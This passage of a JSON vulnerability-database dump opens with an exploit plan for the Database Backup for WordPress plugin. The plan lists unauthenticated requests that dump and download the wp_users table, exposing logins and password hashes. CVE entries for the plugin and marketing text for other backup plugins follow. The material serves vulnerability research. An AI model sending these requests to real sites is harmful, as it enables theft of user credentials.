); \u002F\u002F Table is dumped to file\n        }\n    }\n    ```\n6.  **Retrieval:** The attacker then makes a second request with `?backup=[filename]` to download the generated file via `deliver_backup()`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **bypasses nonce checks entirely**.\n*   The `do_backup` POST path in `__construct` is protected by `check_admin_referer( $this->referer_check_key )`.\n*   However, the `fragment` and `backup` GET paths used for the fragment-based backup process **do not verify nonces** in the vulnerable versions.\n*   **Conclusion:** No nonce is required for this exploit.\n\n## 5. Exploitation Strategy\n\n### Step 1: Trigger Table Export\nIdentify the target table (usually the users table, including the prefix, e.g., `wp_users`). We will use a custom filename to avoid collision with the Swatch-time-based default filenames.\n\n**Request:**\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Findex.php?fragment=wp_users:0:pwned_db.sql`\n\nThe plugin will execute `backup_fragment('wp_users', 0, 'pwned_db.sql')`, writing the first segment of the users table to the backup directory.\n\n### Step 2: Download the Export\nOnce the file is generated, request it using the `backup` parameter.\n\n**Request:**\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Findex.php?backup=pwned_db.sql&via=http`\n\nThe plugin will call `deliver_backup('pwned_db.sql', 'http')`, which sends the SQL file content in the HTTP response.\n\n## 6. Test Data Setup\n1.  **Multisite Setup:** Convert the test WordPress instance to a Multisite network (add `define('WP_ALLOW_MULTISITE', true);` to `wp-config.php` and follow the Network Setup).\n2.  **Mock Deprecated Function:** Since `is_site_admin()` was removed in WP 3.0, ensure it is available to satisfy the exploit condition:\n    *   `wp eval 'function is_site_admin() { return false; }' --skip-plugins` (Or add this function to a custom mu-plugin).\n3.  **Plugin Configuration:** Install and activate `wp-db-backup` version 2.5.2.\n4.  **Target Data:** Create several dummy users to verify they appear in the export.\n\n## 7. Expected Results\n*   **First Request:** Should return a 200 OK (often with minimal output or a script tag).\n*   **Second Request:** The response headers should include `Content-Type: application\u002Foctet-stream` (or similar) and `Content-Disposition: attachment; filename=\"pwned_db.sql\"`.\n*   **Content:** The body of the response should contain valid SQL dump syntax (e.g., `INSERT INTO \"wp_users\" ...`).\n\n## 8. Verification Steps\n1.  **Check for generated file:** After Step 1, use WP-CLI to verify the file exists in the temporary backup directory:\n    `wp eval 'echo get_temp_dir();'` \n    Search that directory for `pwned_db.sql`.\n2.  **Inspect Response:** Verify the downloaded SQL contains sensitive data such as user login names and hashed passwords.\n\n## 9. Alternative Approaches\n*   **Automated Full Export:** If `fragment` requires iterating segments, a script can be written to loop through `segment` values (0, 1, 2...) until the table is fully dumped.\n*   **Core Tables Guessing:** If the table prefix is unknown, attempt to guess common ones (`wp_`, `wp_1_`, `wp_2_`) or try to dump `wp_options` first to find the prefix.\n*   **Temporary Directory Traversal:** If `validate_file` is weak (not visible in snippet), try to use the `backup` parameter to read other system files, though the plugin primarily restricts this to `$this->backup_dir`.","2026-05-14 17:39:57","2026-05-14 17:41:04",{"id":93,"url_slug":94,"title":95,"description":96,"plugin_slug":4,"theme_slug":38,"affected_versions":97,"patched_in_version":6,"severity":41,"cvss_score":98,"cvss_vector":99,"vuln_type":100,"published_date":101,"updated_date":102,"references":103,"days_to_patch":105,"patch_diff_files":106,"patch_trac_url":38,"research_status":38,"research_verified":54,"research_rounds_completed":28,"research_plan":38,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":38,"research_started_at":38,"research_completed_at":38,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2022-1577","database-backup-for-wordpress-cross-site-request-forgery-to-settings-update","Database Backup for WordPress \u003C= 2.5.1 - Cross-Site Request Forgery to Settings Update","The Database Backup for WordPress plugin before 2.5.2 does not have CSRF check in place when updating the schedule backup settings, which could allow an attacker to make a logged in admin change them via a CSRF attack. This could lead to cases where attackers can send backup notification emails to themselves, which contain more details. Or disable the automatic backup schedule","\u003C2.5.2",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Cross-Site Request Forgery (CSRF)","2022-05-11 00:00:00","2024-01-22 19:56:02",[104],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F211350ac-24c4-4aa7-aea6-5dc44f753185?source=api-prod",622,[],{"id":108,"url_slug":109,"title":110,"description":111,"plugin_slug":4,"theme_slug":38,"affected_versions":112,"patched_in_version":113,"severity":41,"cvss_score":114,"cvss_vector":115,"vuln_type":116,"published_date":117,"updated_date":102,"references":118,"days_to_patch":120,"patch_diff_files":121,"patch_trac_url":38,"research_status":38,"research_verified":54,"research_rounds_completed":28,"research_plan":38,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":38,"research_started_at":38,"research_completed_at":38,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2022-0255","database-backup-for-wordpress-admin-sql-injection","Database Backup for WordPress \u003C= 2.5 - Admin+ SQL Injection","The Database Backup for WordPress plugin before 2.5.1 does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to an SQL injection issue","\u003C2.5.1","2.5.1",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2022-01-24 00:00:00",[119],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4062f981-a1d2-4e54-8fd9-f8855af0a7db?source=api-prod",729,[],{"id":123,"url_slug":124,"title":125,"description":126,"plugin_slug":4,"theme_slug":38,"affected_versions":127,"patched_in_version":128,"severity":129,"cvss_score":130,"cvss_vector":131,"vuln_type":132,"published_date":133,"updated_date":102,"references":134,"days_to_patch":136,"patch_diff_files":137,"patch_trac_url":38,"research_status":38,"research_verified":54,"research_rounds_completed":28,"research_plan":38,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":38,"research_started_at":38,"research_completed_at":38,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2021-24322","database-backup-for-wordpress-authenticated-stored-cross-site-scripting-via-backupreceipient-parameter","Database Backup for WordPress \u003C= 2.3.3 - Authenticated Stored Cross-Site Scripting via backup_receipient Parameter","The Database Backup for WordPress plugin before 2.4 did not escape the backup_recipient POST parameter in before output it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue.","\u003C2.4","2.4","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2021-05-16 00:00:00",[135],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F453c656a-c26d-44c3-bc7d-7fc502a00b03?source=api-prod",982,[],{"id":139,"url_slug":140,"title":141,"description":142,"plugin_slug":4,"theme_slug":38,"affected_versions":143,"patched_in_version":144,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":145,"updated_date":102,"references":146,"days_to_patch":148,"patch_diff_files":149,"patch_trac_url":38,"research_status":38,"research_verified":54,"research_rounds_completed":28,"research_plan":38,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":38,"research_started_at":38,"research_completed_at":38,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2014-10076","database-backup-for-wordpress-missing-authorization","Database Backup for WordPress \u003C= 2.2.4 - Missing Authorization","The wp-db-backup plugin up to 2.2.4 for WordPress relies on a five-character string for access control, which makes it easier for remote attackers to read backup archives via a brute-force attack.","\u003C=2.2.4","2.3.0","2014-11-02 00:00:00",[147],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7b73d309-5c3a-4a46-95df-fd7a59c66275?source=api-prod",3369,[],{"slug":151,"display_name":7,"profile_url":8,"plugin_count":152,"total_installs":153,"avg_security_score":154,"avg_patch_time_days":155,"trust_score":156,"computed_at":157},"wpengine",16,3525410,91,831,73,"2026-05-19T21:17:11.113Z",[159,179,202,222,242],{"slug":160,"name":161,"version":162,"author":163,"author_profile":164,"description":165,"short_description":166,"active_installs":28,"downloaded":167,"rating":28,"num_ratings":28,"last_updated":168,"tested_up_to":169,"requires_at_least":170,"requires_php":171,"tags":172,"homepage":176,"download_link":177,"security_score":178,"vuln_count":28,"unpatched_count":28,"last_vuln_date":38,"fetched_at":30},"db-backup-by-fairshare-tech","DB Backup by Fairshare.tech","1.0.2","Keshav Grover","https:\u002F\u002Fprofiles.wordpress.org\u002Fkeshavgrover\u002F","\u003Cp>\u003Cstrong>DB Backup by Fairshare.tech\u003C\u002Fstrong> lets you create automated WordPress database backups on your preferred schedule. It uses \u003Ccode>mysqldump\u003C\u002Fcode> if available for fast and reliable backups, and falls back to a PHP-based method if \u003Ccode>mysqldump\u003C\u002Fcode> is unavailable.\u003C\u002Fp>\n\u003Cp>Backups are stored securely in your \u003Ccode>wp-content\u002Fuploads\u002Fdb_backup\u002F\u003C\u002Fcode> directory, and you can choose to have them emailed to your admin email address. The plugin provides a settings page for configuration and supports triggering backups via a real cron job for reliability.\u003C\u002Fp>\n\u003Ch3>\u003Cstrong>Features\u003C\u002Fstrong>\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Flexible backup frequency: Daily, Weekly, or Monthly.\u003C\u002Fli>\n\u003Cli>Backups saved in \u003Ccode>wp-content\u002Fuploads\u002Fdb_backup\u002F\u003C\u002Fcode> with timestamped filenames.\u003C\u002Fli>\n\u003Cli>Option to email backups to the admin email address.\u003C\u002Fli>\n\u003Cli>Uses \u003Ccode>mysqldump\u003C\u002Fcode> if available, with PHP fallback.\u003C\u002Fli>\n\u003Cli>No dependency on WP-Cron—supports real cron jobs via a secure endpoint.\u003C\u002Fli>\n\u003Cli>Secure authentication using unique access key for cron URL.\u003C\u002Fli>\n\u003Cli>Simple configuration via WordPress Settings page.\u003C\u002Fli>\n\u003C\u002Fol>\n","Automatic WordPress database backups with mysqldump or PHP fallback. Supports email and reliable real cron jobs.",309,"2025-08-31T07:38:00.000Z","6.8.5","5.0","7.4",[173,174,22,23,175],"automatic-backup","cron-job","mysqldump","","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdb-backup-by-fairshare-tech.1.0.2.zip",100,{"slug":180,"name":181,"version":182,"author":183,"author_profile":184,"description":185,"short_description":186,"active_installs":187,"downloaded":188,"rating":189,"num_ratings":190,"last_updated":191,"tested_up_to":192,"requires_at_least":193,"requires_php":176,"tags":194,"homepage":198,"download_link":199,"security_score":13,"vuln_count":200,"unpatched_count":28,"last_vuln_date":201,"fetched_at":30},"updraftplus","UpdraftPlus: WP Backup & Migration Plugin","1.26.2","David Anderson \u002F Team Updraft","https:\u002F\u002Fprofiles.wordpress.org\u002Fdavidanderson\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fupdraftplus.com\" rel=\"nofollow ugc\">The UpdraftPlus Backup & Migration Plugin\u003C\u002Fa> is trusted by the WordPress community to backup, restore and migrate their WordPress websites. UpdraftPlus is actively installed on more than 3 million websites around the world.\u003C\u002Fp>\n\u003Ch4>Backup with UpdraftPlus\u003C\u002Fh4>\n\u003Cp>UpdraftPlus is the world’s highest ranking and most popular scheduled backup and migration plugin. Backup to your preferred storage location and restore in just three clicks.\u003C\u002Fp>\n\u003Cp>Backup to Dropbox, Google Drive, Amazon S3 (or compatible), Rackspace Cloud, FTP, DreamObjects, Openstack Swift or email.\u003C\u002Fp>\n\u003Cp>The paid version also allows you to backup to Microsoft OneDrive, Microsoft Azure, Google Cloud, Backblaze B2, SFTP, SCP, pCloud, WebDAV or UpdraftVault, our integrated storage option for UpdraftPlus.\u003C\u002Fp>\n\u003Cp>Backup manually or schedule to run every 2, 4, 8 or 12 hours, daily, weekly, monthly or fortnightly.\u003C\u002Fp>\n\u003Ch4>Restore with UpdraftPlus\u003C\u002Fh4>\n\u003Cp>Your WordPress website is vulnerable. Your site may get hacked. Something could go wrong with an update or your server could crash. You might need to reverse a change made or a mistake caused by human error.\u003C\u002Fp>\n\u003Cp>Whatever the reason, you can restore your WordPress website in just a few clicks with UpdraftPlus. Choose which components to restore (e.g. plugins, themes, database etc.), click again to restore, then click again to return to the main screen.\u003C\u002Fp>\n\u003Ch4>Migrate with UpdraftPlus\u003C\u002Fh4>\n\u003Cp>It’s easy to migrate your WordPress website to another web host, server or domain with this free version of UpdraftPlus.\u003C\u002Fp>\n\u003Cp>To migrate, simply download your database, plugins, themes etc. from the source site, then upload them into your destination site.\u003C\u002Fp>\n\u003Cp>When migrating, a built-in search-and-replace engine identifies old strings and replaces these to reflect the new location. UpdraftPlus saves you time and reduces the risk of broken links or missing files associated with manual migrations.\u003C\u002Fp>\n\u003Ch4>Why UpdraftPlus?\u003C\u002Fh4>\n\u003Cp>Writing a reliable backup and migration plugin that ‘just works’ consistently across millions of different WordPress deployments is hard. UpdraftPlus is relied upon to do exactly that. We’re trusted and actively deployed on more websites around the world than any other WordPress backup and migration plugin.\u003C\u002Fp>\n\u003Cp>UpdraftPlus:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Backs up, migrates and restores\u003C\u002Fli>\n\u003Cli>Offers a huge number of remote storage locations\u003C\u002Fli>\n\u003Cli>Allows you to schedule backups, so you can ‘set and forget’\u003C\u002Fli>\n\u003Cli>Is comprehensive and easy to use\u003C\u002Fli>\n\u003Cli>Is proven to work on over 3 million sites.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F154870690\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch4>UpdraftPlus Premium\u003C\u002Fh4>\n\u003Cp>The free version of UpdraftPlus will back up and migrate your website perfectly well. However if you need more features and options you can purchase our Premium version.\u003C\u002Fp>\n\u003Cp>Backup and Migrate with UpdraftPlus Premium, and:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Get automatic backups before updates. Restore the very latest version if a WordPress or plugin update breaks your site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Backup Incrementally. Changes are added to the master, saving server resources vs repeatedly backing up in full.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get more remote storage options including Microsoft OneDrive, SFTP, Microsoft Azure, WebDAV, Google Cloud, SCP, Backblaze and pCloud.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get 1GB of integrated storage with UpdraftVault for 99.999% reliability, redundancy and scalability.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get more control over how many backups are stored in a specified interval.\u003Cbr \u002F>\nRestore from other backup plugins including BackWPup, BackupWordPress, Simple Backups and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Run backups at set times e.g. during periods of low traffic.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Backup to more than one location for added protection.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get detailed reports. Includes cryptographic checksums so you can verify the integrity of the backup files and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get Premium migration. Migrating to the destination site is more direct and can be done from the source site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get Multisite \u002F multi-network compatibility.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Backup non-WP files and databases e.g. tables belonging to your e-commerce store or customisations to WordPress core.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get database encryption.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Manage your backups and migrations from the WP-CLI.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Get Premium Support.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Find out more \u003Ca href=\"https:\u002F\u002Fupdraftplus.com\u002Fcomparison-updraftplus-free-updraftplus-premium\u002F\" rel=\"nofollow ugc\">on our comparison page\u003C\u002Fa>. UpdraftPlus Premium is available for purchase \u003Ca href=\"https:\u002F\u002Fupdraftplus.com\u002Fshop\u002F\" rel=\"nofollow ugc\">here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Managing multiple websites?\u003C\u002Fh4>\n\u003Cp>UpdraftCentral is a powerful remote control dashboard for WordPress that allows you to manage your backups, as well as updates, users, pages, posts, plugins and themes from one central location. Choose between:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fupdraftcentral\u002F#description\u002F\" rel=\"ugc\">UpdraftCentral\u003C\u002Fa> (free, self-hosted)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fupdraftplus.com\u002Fshop\u002Fupdraftcentral-premium\u002F\" rel=\"nofollow ugc\">UpdraftCentral Premium\u003C\u002Fa> (paid-for, self-hosted)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fupdraftplus.com\u002Fshop\u002Fupdraftcentral-dashboard\u002F\" rel=\"nofollow ugc\">UpdraftCentral Cloud\u003C\u002Fa> (paid-for, fully-hosted)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Optimize your sites centrally by combining the power of WP-Optimize and UpdraftCentral or manage your backups centrally by combining the power of UpdraftPlus with UpdraftCentral.\u003C\u002Fp>\n\u003Ch4>Need to create a temporary clone of your site?\u003C\u002Fh4>\n\u003Cp>UpdraftClone makes it quick and easy to create a temporary sandbox for changes you want to try out. Simply select the versions of WordPress and PHP that you want, and we’ll do the rest. \u003Ca href=\"https:\u002F\u002Fupdraftplus.com\u002Fshop\u002Fupdraftclone-tokens\u002F\" rel=\"nofollow ugc\">More about UpdraftClone\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>The full suite of plugins from Team Updraft and friends\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fupdraftplus.com\" rel=\"nofollow ugc\">UpdraftPlus\u003C\u002Fa>.\u003Cbr \u002F>\nBackup, migrate and restore. Rated 5* on the plugin directory and trusted by more than 3 million WordPress website owner\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgetwpo.com\" rel=\"nofollow ugc\">WP-Optimize\u003C\u002Fa>.\u003Cbr \u002F>\nClean the database, compress images and caching. Optimize your WordPress website. 5* user rating. 1 million + active installs.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Faiosplugin.com\" rel=\"nofollow ugc\">All-In-One Security (AIOS)\u003C\u002Fa>.\u003Cbr \u002F>\nSecure your WordPress website. Comprehensive, feature rich and easy to use. 5* user rating and 1 million + active installs.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpovernight.com\" rel=\"nofollow ugc\">WP Overnight\u003C\u002Fa>.\u003Cbr \u002F>\nQuality Extensions for your WooCommerce store. 5* rated invoicing, order and product management, customer management solutions and more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Feasyupdatesmanager.com\" rel=\"nofollow ugc\">Easy Updates Manager\u003C\u002Fa>.\u003Cbr \u002F>\nTake control of updates. Lots of features for free, and a Premium version with even more – over 300,000 users.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.internallinkjuicer.com\" rel=\"nofollow ugc\">Internal Link Juicer\u003C\u002Fa>.Boost your SEO. Automate internal links within your WordPress website. Save time and rank higher in the search engines.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>For other useful, free plugins see \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fdavidanderson\u002F#content-plugins\" rel=\"nofollow ugc\">our lead developer’s profile, here\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Are you multilingual? Can you translate?\u003C\u002Fh4>\n\u003Cp>Do you want to help people that speak your language to backup, migrate and restore their WordPress websites?\u003C\u002Fp>\n\u003Cp>The UpdraftPlus backup, migration and restoration plugin is ready and waiting. The translation process is easy, and web-based – please go here for instructions: https:\u002F\u002Fupdraftplus.com\u002Ftranslate\u002F.\u003C\u002Fp>\n\u003Cp>Or, if you’re already an expert WordPress translator, just pick out the .pot file from the wp-content\u002Fplugins\u002Fupdraftplus\u002Flanguages\u002F directory – if you scan for translatable strings manually, then you need to get these functions: _x(), __(), _e(), _ex(), log_e().\u003C\u002Fp>\n\u003Cp>Many thanks to our existing translators.\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cpre>\u003Ccode>Copyright 2011-24 David Anderson\n\nThis program is free software; you can redistribute it and\u002For modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>Non-English translators are provided by volunteers, and wordpress.org does not give plugin developers control over their translations; thus relying on them is at your own risk; UpdraftPlus cannot guarantee that translations from the original English are accurate.\u003C\u002Fp>\n\u003Cp>We recognise and thank those mentioned at https:\u002F\u002Fupdraftplus.com\u002Facknowledgements\u002F for code and\u002For libraries used and\u002For modified under the terms of their open source licences.\u003C\u002Fp>\n","Backup, restore or migrate your WordPress website to another host or domain. Schedule backups or run manually. Migrate in minutes.",3000000,154601908,96,8440,"2026-03-25T10:43:00.000Z","7.0","3.2",[20,195,22,196,197],"cloud-backup","migration","wordpress-backup","https:\u002F\u002Fupdraftplus.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fupdraftplus.1.26.2.zip",14,"2025-01-15 09:43:13",{"slug":203,"name":204,"version":205,"author":206,"author_profile":207,"description":208,"short_description":209,"active_installs":210,"downloaded":211,"rating":212,"num_ratings":213,"last_updated":214,"tested_up_to":215,"requires_at_least":18,"requires_php":171,"tags":216,"homepage":217,"download_link":218,"security_score":219,"vuln_count":220,"unpatched_count":28,"last_vuln_date":221,"fetched_at":30},"duplicator","Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More","1.5.16","Syed Balkhi","https:\u002F\u002Fprofiles.wordpress.org\u002Fsmub\u002F","\u003Ch4>WordPress Backup & Migration Plugin\u003C\u002Fh4>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002F?utm_source=wprepo&utm_medium=link&utm_content=top_link&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Duplicator\u003C\u002Fa> provides a simple way to move WordPress sites, create reliable backups, or clone a site for staging. With Duplicator, you can easily migrate, transfer, or clone your WordPress site between domains or hosts with no downtime. Create full backups of your website, or package your entire site to download and install elsewhere with only a few steps.\u003C\u002Fp>\n\u003Cp>At Duplicator, reliabilty, security, and ease of use are our top priorities. Our variety of cloud backup integrations and easy migration wizard make Duplicator the most beginner-friendly backup and migration plugin on the market. You don’t have to hire a developer. Create a backup and migrate sites in just a few minutes.\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>\u003Cstrong>Duplicator Pro\u003C\u002Fstrong>\u003Cbr \u002F>\n  This plugin is the Lite version of Duplicator Pro, which comes with scheduled backups, cloud storage integrations, multisite support, and more. \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002F?utm_source=wprepo&utm_medium=link&utm_campaign=duplicator_lite&utm_content=get_duplicator_pro\" rel=\"nofollow ugc\">Get Duplicator Pro for the complete migration and backup solution\u003C\u002Fa>.\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FMSa83NkLDmU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch4>Easy Site Migration, Backup, and Cloning\u003C\u002Fh4>\n\u003Cp>Duplicator streamlines site migrations by packaging your website files and database into a single file, known as a “backup”. Download and re-install your “backup” on any new WordPress location or server without dealing with complicated setups. Launch at your new destination without installing WordPress. Duplicator is the \u003Cstrong>only\u003C\u002Fstrong> migration and backup plugin that works on an empty site.\u003C\u002Fp>\n\u003Cp>See why experts love Duplicator:\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Duplicator provides an easy to use tool to make backups of your site, or to transfer it to another location.”\u003Cbr \u002F>\n  Richard McAdams – Expert Web Developer\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Ch4>Secure WordPress Backups\u003C\u002Fh4>\n\u003Cp>Duplicator offers cloud \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fsecure-wordpress-backups\u002F?utm_source=wprepo&utm_medium=link&utm_content=secure_wordpress_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">WordPress backups\u003C\u002Fa> with military-grade encryption. Automatically backup your entire WordPress site to secure cloud storage.\u003C\u002Fp>\n\u003Ch4>Recovery Points (1-click Restore)\u003C\u002Fh4>\n\u003Cp>Duplicator makes \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fdisaster-recovery-1-click-restore\u002F?utm_source=wprepo&utm_medium=link&utm_content=1_click_restores&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">1-click restores\u003C\u002Fa> for WordPress backups easy and stress-free. Quickly restore your entire website in minutes just like a time machine.\u003C\u002Fp>\n\u003Ch4>Fast WordPress Migrations\u003C\u002Fh4>\n\u003Cp>Duplicator makes \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-migration\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_migrations&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">WordPress website migrations\u003C\u002Fa> fast and stress-free. Quickly move to a new host, domain, or server. No downtime, no data loss, and no coding required.\u003C\u002Fp>\n\u003Ch4>WordPress Multisite Backups\u003C\u002Fh4>\n\u003Cp>Duplicator offers automatic \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-multisite-backups\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_multisite_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">WordPress Multisite backups\u003C\u002Fa> with easy 1-click restore. Safely backup your entire Multisite network to secure cloud storage.\u003C\u002Fp>\n\u003Ch4>WooCommerce Backups\u003C\u002Fh4>\n\u003Cp>Duplicator offers reliable \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwoocommerce-backups\u002F?utm_source=wprepo&utm_medium=link&utm_content=woocommerce_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">WooCommerce backups\u003C\u002Fa> with military-grade encryption. Easily and automatically back up your entire online store to secure cloud storage.\u003C\u002Fp>\n\u003Ch4>Pre-configured WordPress Installs\u003C\u002Fh4>\n\u003Cp>Never start from scratch with Duplicator’s smart \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fpre-configured-wordpress-installations\u002F?utm_source=wprepo&utm_medium=link&utm_content=pre_configured_installs&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">pre-configured WordPress installs\u003C\u002Fa>. Save time and hassle duplicating ready-made sites with 1-click.\u003C\u002Fp>\n\u003Ch4>WordPress Recovery Points with Quick Rollbacks\u003C\u002Fh4>\n\u003Cp>Duplicator offers hourly recovery points and \u003Ca 